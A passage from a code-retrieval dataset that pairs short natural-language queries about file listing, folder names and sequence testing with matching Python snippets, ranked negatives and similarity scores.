f\"{service}.{service_region}.amazonaws.com\"\n endpoint_service[\"PrivateDnsNameVerificationState\"] = \"verified\"\n endpoint_service[\"PrivateDnsNames\"] = [\n {\"PrivateDnsName\": f\"{service}.{service_region}.amazonaws.com\"}\n ]\n return [endpoint_service]", "def describe_endpoint(EndpointName=None):\n pass", "def test_route_with_upload_service_absent(self, mocker):\n client = wsgi.application.test_client(mocker)\n\n url = '/'\n\n response = client.get(url)\n\n output = {\n \"message\": \"upload-service not operational\",\n \"status\": \"Error\",\n \"version\": wsgi.VERSION\n }\n assert response.get_json() == output\n assert response.status_code == 500", "def test_unknown_resource_under_service(self):\n raise NotImplementedError # FIXME", "def test_egress_returns_envelope_unchanged():\n plugin_instance = PluginVipCustomisation()\n assert plugin_instance.egress('envelope', 'http_headers', 'operation', 'binding_options') == ('envelope', 'http_headers')", "def test_142_cinder_endpoint(self):\n u.log.debug('Checking cinder endpoint...')\n endpoints = self.keystone_v2.endpoints.list()\n admin_port = internal_port = public_port = '8776'\n expected = {\n 'id': u.not_null,\n 'region': 'RegionOne',\n 'adminurl': u.valid_url,\n 'internalurl': u.valid_url,\n 'publicurl': u.valid_url,\n 'service_id': u.not_null\n }\n\n ret = u.validate_endpoint_data(endpoints, admin_port, internal_port,\n public_port, expected)\n if ret:\n amulet.raise_status(amulet.FAIL,\n msg='cinder endpoint: {}'.format(ret))", "def default_vpc_endpoint_service(\n service_region: str, zones: List[str] # pylint: disable=unused-argument\n ) -> List[Dict[str, str]]:\n return []", "def enable_vnet_integration(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_vnet_integration\")", "def valid_endpoint(cls):\n\t\treturn cls.__subclasses__() == []", "def test_virtualservice_get(self):\n pass", "def test_aws_service_api_interfaces_get(self):\n pass", "def validate_raw_endpoint(raw_endpoint: Dict[str, Any]) -> None:\n validate_raw_endpoint_route(raw_endpoint)\n validate_raw_endpoint_method(raw_endpoint)", "def get_neutron_endpoint(cls, json_resp):\n catalog = json_resp.get('token', {}).get('catalog', [])\n match = 'neutron'\n\n neutron_endpoint = None\n for entry in catalog:\n if entry['name'] == match or 'Networking' in entry['name']:\n valid_endpoints = {}\n for ep in entry['endpoints']:\n interface = ep.get('interface', '')\n if interface in ['public', 'internal']:\n valid_endpoints[interface] = ep['url']\n\n if valid_endpoints:\n # Favor public endpoints over internal\n neutron_endpoint = valid_endpoints.get(\"public\", valid_endpoints.get(\"internal\"))\n break\n else:\n raise MissingNeutronEndpoint()\n\n return neutron_endpoint", "def aggregator_unavailable_apiservice(self, metric, scraper_config):\n for sample in metric.samples:\n sample[self.SAMPLE_LABELS][\"apiservice_name\"] = sample[self.SAMPLE_LABELS].pop(\"name\")\n self.submit_metric('.aggregator_unavailable_apiservice', metric, scraper_config, monotonic_count=False)", "def test_basic_remove_endpoint(self):\n mac, ip = self.setup_with_endpoint()\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac, ip, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg1'))\n self.remove_endpoint(mac, ip, 'intersite-testsuite', 'app', 'epg1')\n self.assertFalse(self.verify_remote_site_has_entry(mac, ip, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg1'))" ]
[ "0.75127226", "0.666186", "0.65345496", "0.61584747", "0.5785869", "0.566079", "0.5657597", "0.5604734", "0.5506748", "0.54837817", "0.5482908", "0.53341347", "0.52935594", "0.52466923", "0.5243484", "0.52242935", "0.52234066", "0.52123487", "0.5211851", "0.5159619", "0.51533693", "0.51478946", "0.5140942", "0.51255417", "0.5115726", "0.51113915", "0.5089006", "0.50795656", "0.5076339", "0.5060741" ]
0.81507653
0
Return a list containing files in current working directory
def get_all_files(cwd): return os.listdir(cwd)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getFiles(self):\n\t\treturn os.listdir(self.getPath())", "def get_my_files():\n return [file for file in os.listdir(os.getcwd()) if os.path.isfile(file)]", "def files_in_dir(path):\n return os.listdir(path)", "def list_files(path):\n ls_output = os.listdir(path)\n return ls_output", "def get_list_of_files_in_dir(file_list_path=None):\n return os.listdir(file_list_path)", "def get_files(self) -> list:\n files = []\n for file in os.listdir(self.root):\n if file.endswith(f\".{self.suffix}\"):\n files.append(os.path.join(self.root, file))\n return files", "def get_files(self):\r\n return self._filelist", "def file_list(start_dir):\n file_list = []\n for root, dirs, files in os.walk(start_dir):\n for f in files:\n if f[0] != '.':\n file_list.append(f)\n return file_list", "def get_files(self) -> tp.Iterable[str]:\n return os.listdir(self.path)", "def files_list(directory: str) -> list:\n files = os.listdir(directory)\n\n return files", "def get_file_list(path: str) -> list:\n\treturn [f for f in listdir(path) if isfile(join(path, f))]", "def listFiles(self):\n pass", "def get_all_files(self):\n\t\tfiles_list = []\n\t\tfor path, subdirs, files in os.walk(self.root):\n\t\t for name in files:\n\t\t \tfiles_list.append(os.path.join(self.root, name))\n\t\treturn files_list[0:-1]", "def scandir(path_):\n return os.listdir", "def retrieve_all_files(self):\n result = utilities.rscandir(\n self.folder(), ignore_dirs=[\".git\"])\n\n return result", "def getAllFiles(self):\n\n\t\treturn self.getFilesForDirs([])", "def lsFiles(ruta = getcwd()):\r\n files = [arch.name for arch in scandir(ruta) if arch.is_file()]\r\n return files", "def find_all_files(self):\n look4files = [ f for f in listdir(self.file_location) if isfile(join(self.file_location,f)) ]\n return look4files", "def retrieve_tracked_files(self):\n result = []\n\n for key in self.repo.index.entries.keys():\n\n result.append(os.path.join(self.repo.working_dir, key[0]))\n\n return result", "def get_file_list(input_dir):\n\tfile_paths = [input_dir +'/' + f for f in listdir(input_dir) if isfile(join(input_dir, f)) ]\n\treturn file_paths", "def listdir(self, path):\n return os.listdir(path)", "def files(self):\n self._printer('\\tFiles Walk')\n for directory in self.directory:\n for path in os.listdir(directory):\n full_path = os.path.join(directory, path)\n if os.path.isfile(full_path):\n if not path.startswith('.'):\n self.filepaths.append(full_path)\n return self._get_filepaths()", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def list_dir(self, path):", "def get_files(self, dir):\n path = os.path.join(self.loc, dir)\n return [f for f in os.listdir(path)\n if os.path.isfile(os.path.join(path, f))]", "def list(self):\n\n if self.isdir():\n from os import listdir\n\n return [u for e in listdir(self.fspath) for u in self.join(e).list()]\n\n else:\n return [self]", "def lists(path):\r\n return os.listdir(path)", "def listfiles(self, *path):\n dir = self.localpath(*path)\n files = []\n for root, dirs, fnms in os.walk(dir):\n for f in fnms:\n if f[-5:] == '.info' and os.path.exists(os.path.join(root, f[:-5])):\n try:\n _open_file_info(os.path.join(root, f))\n files.append(\n path + tuple(_split_path(\n os.path.relpath(os.path.join(root, f[:-5]), start=dir)\n )))\n except ValueError:\n pass\n return files", "def get_file_list(self):\n try:\n for filename in os.listdir(SHARED_DIR):\n self.file_list.append(filename)\n except Exception as e:\n print \"Error: retriving file list, %s\" % e", "def _list_dir(self):\n return [os.path.join(self.cache_dir, fn)\n for fn in os.listdir(self.cache_dir)]" ]
[ "0.8243705", "0.7986272", "0.78300756", "0.7797188", "0.77566135", "0.7747943", "0.7612247", "0.75997365", "0.75865906", "0.7568702", "0.7565383", "0.754392", "0.74458206", "0.74326265", "0.7400026", "0.73980325", "0.738138", "0.7292439", "0.7267739", "0.7262558", "0.72419256", "0.72250676", "0.72073245", "0.7192978", "0.7182596", "0.7176294", "0.7173945", "0.71463805", "0.7134495", "0.71134394" ]
0.82731485
0
Return a list of folder name
def folder_name(self): folders = [] for folder in self.folders: folders.append(folder) return folders
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_folder_list(args):\n\tif not args.folders:\n\t\treturn None\n\n\tif os.path.isfile(args.folders):\n\t\treturn [x.strip() for x in list(open(args.folders, 'r'))]\n\n\telse:\n\t\treturn [x.strip() for x in args.folders.split(',')]", "def get_list_of_folders(self, end_of_folder_name):\n folder_list = [os.path.basename(f) for f in glob.glob(os.path.join(self.parent_folder, end_of_folder_name))]\n folder_list.sort()\n return folder_list", "def listImageFolderString():\n return ' '.join(map('\"{}\"'.format, listImageFolder()))", "def listFolders(folderRoot):\n return os.listdir(folderRoot)", "def get_folder_list():\n if exists_key_store('folders:list'):\n return get_key_store('folders:list')\n else:\n # initialize folder list with root (All)\n set_key_store('folders:counter', 0)\n rpush_key_store('folders:list', {'id': 0, 'parent': -1, 'name': 'All'})\n return get_key_store('folders:list')", "def root_directory_list(self) -> str:\n return self.__root_directory_list", "def list_dir(self, path):", "def owncloud_folder_list(node_addon, user_addon, **kwargs):\n path = request.args.get('path')\n return node_addon.get_folders(path=path)", "def ListFolder(self, path): # real signature unknown; restored from __doc__\n pass", "def listdirs(self):\n return self.list_groups()", "def build_folder_names(result: Dict[str, Any], folder_name: str = \"\") -> List[Any]:\n folder_name = \"/\".join((folder_name, result.get(\"name\", \"\"))).replace(\"//\", \"/\")\n folders = [folder_name]\n if not result.get(\"children\"):\n return folders\n\n for child in result[\"children\"]:\n folders.extend(build_folder_names(child, folder_name))\n\n return folders", "def lsFolders(ruta = getcwd()):\r\n folders = [arch.name for arch in scandir(ruta) if arch.is_file() == False]\r\n return folders", "def list_dirs(self):\n return self.list_groups()", "def list_folders(path):\n return (name for name in os.listdir(path)\n if os.path.isdir(os.path.join(path, name)))", "def created_names(self, prefix):\n assert os.path.isdir(prefix)\n cwd = os.getcwd()\n os.chdir(prefix)\n names = tuple(sorted(filter(\n os.path.isdir,\n glob.glob(os.path.join(*('*' * self.depth))))))\n os.chdir(cwd)\n return names", "def getFolderPath(self) -> unicode:\n ...", "def dir_list_folder(head_dir, dir_name):\n dirList = []\n for fn in os.listdir(head_dir):\n dirfile = os.path.join(head_dir, fn)\n if os.path.isdir(dirfile):\n if fn.upper() == dir_name.upper():\n dirList.append(dirfile)\n else:\n dirList += dir_list_folder(dirfile, dir_name)\n if dirList != []:\n break\n return dirList", "def list_folders_into_directory(directory_path: str) -> [str]:\n for root, directory_names, file_names in walk(directory_path):\n return directory_names", "def folder(fpath):\n file_paths = glob.glob(fpath + '/*.dat')\n return list(file_paths)", "def get_folder_list(self, folders: List[str]) -> List[str]:\n if self.current_folder != Path(self.current_folder.parts[0]):\n return [self.PARENT, *(sorted(folders))]\n return sorted(folders)", "def get_directory_list(self):\r\n lines = []\r\n self.ftp.retrlines('LIST', lines.append)\r\n return lines", "def get_child_folder_names(folder_path):\n folder_names_in_folder = []\n try:\n for f in listdir(folder_path):\n if '__pycache__' not in f and isdir(\"%s/%s\" %(folder_path,f)):\n folder_names_in_folder.append(f)\n except OSError as e:\n # error\n print(\"ERROR IN get_child_folder_names\")\n\n return folder_names_in_folder", "def listdir(self, path: bytes) -> List[bytes]:\n directories, files = self.storage.listdir(path.decode())\n return (\n [b\".\", b\"..\"]\n + [name.encode() for name in directories if name]\n + [name.encode() for name in files if name]\n )", "def retrieve_folders(dir):\n print(dir)\n items = os.listdir(dir)\n folders = []\n for item in items:\n print(item )\n if os.path.isdir(dir+'/'+item):\t\t\t#what means of preconditions in if \n folders.append(dir+'/'+item) \n return folders", "def get_dirnames(path):\n storage = DefaultStorage()\n dirnames = storage.listdir(path)[0]\n dirnames.sort()\n return dirnames", "def get_folder_filenames(folder_path: str) -> list:\n\n folder_path = 'images/right'\n folder_file_list = os.listdir(folder_path)\n folder_file_list.sort()\n\n return folder_file_list", "def list_files_in_given_folder(path_to_folder):\r\n file_names_list = []\r\n for file_name in glob.glob(path_to_folder+\"/*\"):\r\n file_names_list.append(file_name)\r\n assert file_names_list != [], \"failed to populate folder\"+path_to_folder\r\n return file_names_list", "def listdir(self, path):\n return os.listdir(path)", "def folder_type(self):\n types = []\n for type in self.folders_type:\n types.append(type)\n return types", "def listdir(self, subdir=''):\n\n try:\n subdir = subdir.decode()\n except AttributeError:\n pass\n subdir = subdir.rstrip('\\\\')\n # cmd = '\"%s\" \"%s\" 0 ' % (self.ndc_path, self.filename)\n cmd = [\n self.ndc_path,\n self.filename,\n '0'\n ]\n if subdir:\n cmd.append(subdir)\n # cmd += '\"%s\"' % subdir\n\n logging.info(cmd)\n try:\n result = check_output(cmd)\n except CalledProcessError:\n raise FileNotFoundError('Subdirectory not found in disk', [])\n\n result = [r.split(b'\\t') for r in result.split(b'\\r\\n')]\n result = list(filter(lambda x: len(x) == 4, result))\n\n filenames = []\n subdirs = []\n for r in result:\n try:\n decoded = r[0].decode('shift_jis')\n if r[2] != b'<DIR>':\n filenames.append(decoded)\n elif r[2] == b'<DIR>' and len(r[0].strip(b'.')) > 0:\n subdirs.append(decoded)\n except UnicodeDecodeError:\n logging.info(\"Couldn't decode one of the strings in the folder: %s\" % subdir)\n continue\n\n return filenames, subdirs" ]
[ "0.76186156", "0.7430843", "0.73491526", "0.73406965", "0.71975374", "0.71707374", "0.7130499", "0.7100979", "0.70779717", "0.70659024", "0.7000448", "0.6987247", "0.69868743", "0.696074", "0.683982", "0.68326867", "0.682668", "0.68047774", "0.67565644", "0.6719934", "0.67135453", "0.6704412", "0.6697293", "0.666592", "0.6663378", "0.66507596", "0.6649529", "0.66489524", "0.66041505", "0.65931225" ]
0.863706
0
Return a list of folder type
def folder_type(self): types = [] for type in self.folders_type: types.append(type) return types
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_folder_files(folder, types):\n files_grabed = []\n for file_type in types:\n files_grabed.extend(glob.glob(os.path.join(folder, file_type)))\n return files_grabed", "def folder_name(self): \n folders = []\n for folder in self.folders:\n folders.append(folder)\n return folders", "def list_dirs(roo_tpath, file_types):\n\n folders = []\n\n for root, dirs, files in os.walk(roo_tpath, followlinks=True):\n for f in files:\n if os.path.splitext(f)[1].lower() in file_types:\n folders += [os.path.relpath(root, roo_tpath)]\n break\n\n return folders", "def get_directories_containing_filetype(self, filetype):\n len_suffix = len(filetype)\n self.get_directories_containing_filetype_loop(self, self.dirpath, filetype, len_suffix)\n return", "def lsFolders(ruta = getcwd()):\r\n folders = [arch.name for arch in scandir(ruta) if arch.is_file() == False]\r\n return folders", "def get_folder_list(args):\n\tif not args.folders:\n\t\treturn None\n\n\tif os.path.isfile(args.folders):\n\t\treturn [x.strip() for x in list(open(args.folders, 'r'))]\n\n\telse:\n\t\treturn [x.strip() for x in args.folders.split(',')]", "def listFolders(folderRoot):\n return os.listdir(folderRoot)", "def retrieve_folders(dir):\n print(dir)\n items = os.listdir(dir)\n folders = []\n for item in items:\n print(item )\n if os.path.isdir(dir+'/'+item):\t\t\t#what means of preconditions in if \n folders.append(dir+'/'+item) \n return folders", "def get_folder_list():\n if exists_key_store('folders:list'):\n return get_key_store('folders:list')\n else:\n # initialize folder list with root (All)\n set_key_store('folders:counter', 0)\n rpush_key_store('folders:list', {'id': 0, 'parent': -1, 'name': 'All'})\n return get_key_store('folders:list')", "def ListFolder(self, path): # real signature unknown; restored from __doc__\n pass", "def list_type_in_dir(path, extension):\n path, extension = check_args(path, extension)\n files = os.listdir(path)\n file_list = [os.path.join(path, f)\n for f in fnmatch.filter(files, '*' + extension)]\n\n return file_list", "def list_folders(path):\n return (name for name in os.listdir(path)\n if os.path.isdir(os.path.join(path, name)))", "def list_dir(self, path):", "def list_folder(self, c_folder_or_c_path):\n raise NotImplementedError", "def get_file_list(self, file_type='.pkl'):\n # Note (Somil): Since we moved from a string to a list convention for data directories, we are adding\n # additional code here to make sure it is backwards compatible.\n if isinstance(self.p.data_creation.data_dir, str):\n self.p.data_creation.data_dir = [self.p.data_creation.data_dir]\n \n file_list = []\n for i in range(len(self.p.data_creation.data_dir)):\n file_list.extend([os.path.join(self.p.data_creation.data_dir[i], f)\n for f in os.listdir(self.p.data_creation.data_dir[i]) if f.endswith(file_type)])\n return file_list", "def get_list_of_folders(self, end_of_folder_name):\n folder_list = [os.path.basename(f) for f in glob.glob(os.path.join(self.parent_folder, end_of_folder_name))]\n folder_list.sort()\n return folder_list", "def list_dirs(self):\n return self.list_groups()", "def testTypeDescendants(self):\n\n cmisClient = CmisClient(self.url, self.user, self.pwd,\n binding=self.binding,\n **self.ext_args)\n repo = cmisClient.getDefaultRepository()\n typeDefs = repo.getTypeDescendants()\n folderDef = None\n for typeDef in typeDefs:\n if typeDef.getTypeId() == 'cmis:folder':\n folderDef = typeDef\n break\n assert folderDef\n assert folderDef.baseId", "def getNotAddableTypes(self):\n rota_tool = getToolByName(self, 'portal_rotatool')\n if (self.contentValues(filter={'portal_type': 'RotaFolder'}) or\n (not rota_tool.getReportingLeadTime()) or\n (not rota_tool.getTakeLength()) or\n (not rota_tool.getExtraTakes()) or\n (not rota_tool.getAvailableReporters())\n ):\n return ['RotaFolder', ]\n return []", "def owncloud_folder_list(node_addon, user_addon, **kwargs):\n path = request.args.get('path')\n return node_addon.get_folders(path=path)", "def create_all_folders_query():\n qry_text = \"<Where><Eq><FieldRef Name=\\\"FSObjType\\\" /><Value Type=\\\"Integer\\\">1</Value></Eq></Where>\"\n return CamlQuery.parse(qry_text, ViewScope.RecursiveAll)", "def listdirs(self):\n return self.list_groups()", "def list_dir(self):\n x = [x for x in os.listdir(self.spath) if os.path.isdir(os.path.join(self.spath, x))]\n if x != [] :\n print (f\"choose one of these : {x}\")", "def get_list_of_files(directory: str, file_type: str) -> list:\n ret = []\n for (root, subdirectories, files) in os.walk(directory):\n for file in files:\n if file.endswith(file_type):\n ret.append(os.path.abspath(os.path.join(root, file)))\n return ret", "def get_path_list(self, type_str=None):\n return list(\n reversed(\n [v.label_str for v in self.parent_gen if type_str in (None, v.type_str)]\n )\n )", "def search_zip(folder: Path, file_type: str) -> list[Path]:\n result = []\n for folder_item in folder.iterdir():\n # Is it a directory?\n if folder_item.is_dir():\n result.extend(search_zip(folder_item, file_type))\n # Is it a file?\n if folder_item.is_file():\n if folder_item.name.endswith(file_type):\n result.append(folder_item)\n return result", "def _listTypesForInterface(portal, interface):\n archetype_tool = getToolByName(portal, 'archetype_tool')\n portal_types = getToolByName(portal, 'portal_types')\n utranslate = portal.utranslate\n types = archetype_tool.listPortalTypesWithInterfaces([interface])\n all_types = [tipe.getId() for tipe in types]\n # fix for bug in listPortalTypesWithInterfaces which returns 2 'ATFolder'\n # when asking for IBaseFolder interface\n unik_types = dict.fromkeys(all_types).keys()\n return [_infoDictForType(tipe, portal_types, utranslate)\n for tipe in unik_types]", "def get_folder_list(self, folders: List[str]) -> List[str]:\n if self.current_folder != Path(self.current_folder.parts[0]):\n return [self.PARENT, *(sorted(folders))]\n return sorted(folders)", "def ntypes(self): # -> list[str]:\n ...", "def getTypesList():\n return Gw2Spidy._request('types')['results']" ]
[ "0.7214165", "0.6907222", "0.6847481", "0.65982836", "0.65898377", "0.6582917", "0.6539961", "0.64663464", "0.64614886", "0.6460519", "0.6443383", "0.64318335", "0.6402228", "0.63659465", "0.632687", "0.63254786", "0.62755585", "0.6269897", "0.6251558", "0.6250081", "0.62454957", "0.62414354", "0.6204248", "0.620233", "0.61914116", "0.6180529", "0.6076346", "0.60192513", "0.5995318", "0.59783727" ]
0.8790956
0
Test the ability to gather sequence
def testGetSequence(): #a few of hand-tested genome positions test_data = [ ('1',500,520,'GTCTGACCTGAGGAGAACTGT'), ('2',500,520,'CCCGACCCCGACCCCGACCCA'), ('3',50000,50020,'TCTTCTTTTATGAAAAAGGAT'), ('4',50000,50020,'AGAGCCCTGCAATTTGAAGAT'), ('5',100000,100020,'AATGTTCACCAGTATATTTTA'), ('X',100000,100020,'TAGGTCTCATTGAGGACAGAT'), ('Y',100000,100020,'TAGGTCTCATTGAGGACAGAT')] for this_check in test_data: yield CheckGetSequence, this_check
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_input_type_seq(self, _run_mock):\n hhblits = self.tool(input_type=hhsuite.QueryType.SEQUENCE)\n self.assertEqual(set(hhblits.REQUIRED), set([\"name\", \"sequence\"]))\n hhblits.run({\"sequence\": self.SEQUENCE, \"name\": self.SEQ_NAME})\n self.verify_common(\"hhblits\", hhblits)\n\n _, kw_args = hhblits.tool.call_args\n self.assertIn(\"input\", kw_args[\"options\"])", "def test_sequence(self, output, input_):\n input_ = \"\\n\".join(input_)\n g = Genes(input_)\n s = Sequence(genes=g, ages=g.size)\n s.run()\n self.assertEquals(s.population.get_survivor(Sequence.IMPOSSIBLE),\n output)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.inframe_cds_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq, in_frame=False), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq, in_frame=False), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequence(self):\n self.assertEqual([1, -3, 9, -27, 81, -243],\n [x for x in GeometricProgression(6, 1, -3)])\n\n self.assertEqual([1, 1, 1, 1, 1],\n [x for x in GeometricProgression(5, 1, 1)])\n\n self.assertEqual([4, 40, 400, 4000, 40000],\n [x for x in GeometricProgression(5, 4, 10)])", "def isSeq(act, resources):\n ok = True \n count = 0\n while (count < len(resources) and ok):\n ok = act.resources[count] <= resources[count]\n count += 1\n return ok", "def test_call(self):\r\n f = lambda id_, seq, qual: len(seq) > 3\r\n s1 = 'aa'\r\n s2 = 'aaaa'\r\n sq = SeqQualBad('Q', f)\r\n self.assertEqual(sq('x', s1, [1, 2, 3]), False)\r\n self.assertEqual(sq('y', s2, [1, 2, 3]), True)\r\n self.assertEqual(sq.FailedIds, ['y'])", "def test_03_visit_special(self):", "def test_02_visit_again(self):", "def testing():\n from random import randint\n algorithms = [dynamic_programming, patience_sort, lis]\n\n sequences = [[],\n [1, 2, 3, 4, 5],\n [5, 4, 3, 2, 1],\n [1, 1, 1, 1],\n [3, 2, 6, 4, 5, 1]]\n sequences.append([26, 65, 42, 18, 73, 73, 85, 13, 89, 79, 74, 84, 62, 72,\n 58])\n for alg in algorithms:\n for seq in sequences:\n if alg(seq) != trivial(seq):\n print((\"%s failed for sequence %s with value %i, \"\n \"but should have %i\") %\n (str(alg),\n str(seq),\n alg(seq),\n trivial(seq)))\n return \"Failure\"\n \"\"\"\n for i in range(100):\n seq = []\n # Dont set this too high, because trival has O(2^n) runtime!\n length = randint(1,20)\n for i in range(length):\n seq.append(randint(1,100))\n if alg(seq) != trivial(seq):\n print((\"%s failed for sequence %s with value %i, \"\n \"but should have %i\") %\n (str(alg),str(seq), alg(seq), trivial(seq)))\n return \"Failure\"\n \"\"\"", "def test_sequence_info(self):\n self.t(\"1,2 info\")\n code, out, err = self.t(\"_get 1.description 2.description\")\n self.assertEqual(out.count(\"miss\"), 2)", "async def test_check_segment_or_target(\n data_type, defined, missing, used, sequence_id, mongo\n):\n await asyncio.gather(\n mongo.otus.insert_one({\"_id\": \"foo\", \"schema\": [{\"name\": \"RNA1\"}]}),\n mongo.references.insert_one(\n {\"_id\": \"bar\", \"data_type\": data_type, \"targets\": [{\"name\": \"CPN60\"}]}\n ),\n mongo.sequences.insert_one(\n {\n \"_id\": \"boo\",\n \"otu_id\": \"foo\",\n \"isolate_id\": \"baz\",\n \"target\": \"CPN60\" if used else \"ITS2\",\n }\n ),\n )\n\n data = {}\n\n if data_type == \"barcode\":\n data[\"target\"] = \"CPN60\" if defined else \"ITS2\"\n else:\n data[\"segment\"] = \"RNA1\" if defined else \"RNA2\"\n\n if missing:\n data = {}\n\n message = await check_sequence_segment_or_target(\n mongo, \"foo\", \"baz\", sequence_id, \"bar\", data\n )\n\n # The only case where an error message should be returned for a genome-type\n # reference.\n if data_type == \"genome\" and not missing and not defined:\n assert message == \"Segment RNA2 is not defined for the parent OTU\"\n return\n\n if data_type == \"barcode\":\n if sequence_id is None and missing:\n assert message == \"The 'target' field is required for barcode references\"\n return\n\n if not missing and not defined:\n assert message == \"Target ITS2 is not defined for the parent reference\"\n return\n\n if sequence_id != \"boo\" and not missing and used and data_type == \"barcode\":\n assert message == \"Target CPN60 is already used in isolate baz\"\n return\n\n assert message is None", "def test_normal_basic():\r\n yield check_normal_basic, False\r\n yield check_normal_basic, False, True\r\n yield check_normal_basic, True", "def _check_items(cls, sequence):\n all([cls._check_item(x) for x in sequence])", "def testSeq(self, mock_gs):\n self.mr._sequences = ['apple', 'banana']\n\n self.assertEqual(\n 'apple',\n self.mr.seq\n )\n\n mock_gs.assert_called_once_with()\n mock_gs.reset_mock()\n\n self.mr._is_seq = False\n\n self.assertEqual(\n None,\n self.mr.seq\n )\n\n # Test that we pulled from the cache\n self.assertFalse(\n mock_gs.called\n )", "def test_uniform_basic():\r\n yield check_uniform_basic, False\r\n yield check_uniform_basic, False, True\r\n yield check_uniform_basic, True", "def testSeqs(self, mock_gs):\n self.mr._sequences = ['apple', 'banana']\n\n self.assertEqual(\n ['apple', 'banana'],\n self.mr.seqs\n )\n\n mock_gs.assert_called_once_with()\n mock_gs.reset_mock()\n\n self.mr._is_seq = False\n\n self.assertEqual(\n [],\n self.mr.seqs\n )\n\n # Test that we pulled from the cache\n self.assertFalse(\n mock_gs.called\n )", "def test_regap(self):\n sc = self.SequenceClass\n self.assertEqual(str(sc(\"TC\").regap(sc(\"A---A-\"))), \"T---C-\")", "def verifyFasta(head,seq,pred):\n\treturn True", "def test_available(self):\n feature_guard = _make_requires(True, \"Error text\")\n results = []\n\n @feature_guard\n def inner():\n results.append(True)\n return True\n\n assert inner() is True\n assert [True] == results", "def test_return_final_seq_user_input_valid():\n for valid_case in [True, False]:\n assert RNN(layers_info=[[\"gru\", 20], [\"lstm\", 8], [\"linear\", 7]],\n hidden_activations=\"relu\", initialiser=\"xavier\", return_final_seq_only=valid_case, input_dim=15)\n\n for invalid_case in [[True], 22, [1, 3], (True, False), (5, False)]:\n with pytest.raises(AssertionError):\n print(invalid_case)\n RNN(layers_info=[[\"gru\", 20], [\"lstm\", 8], [\"linear\", 7]],\n hidden_activations=\"relu\", initialiser=\"xavier\", return_final_seq_only=invalid_case, input_dim=15)" ]
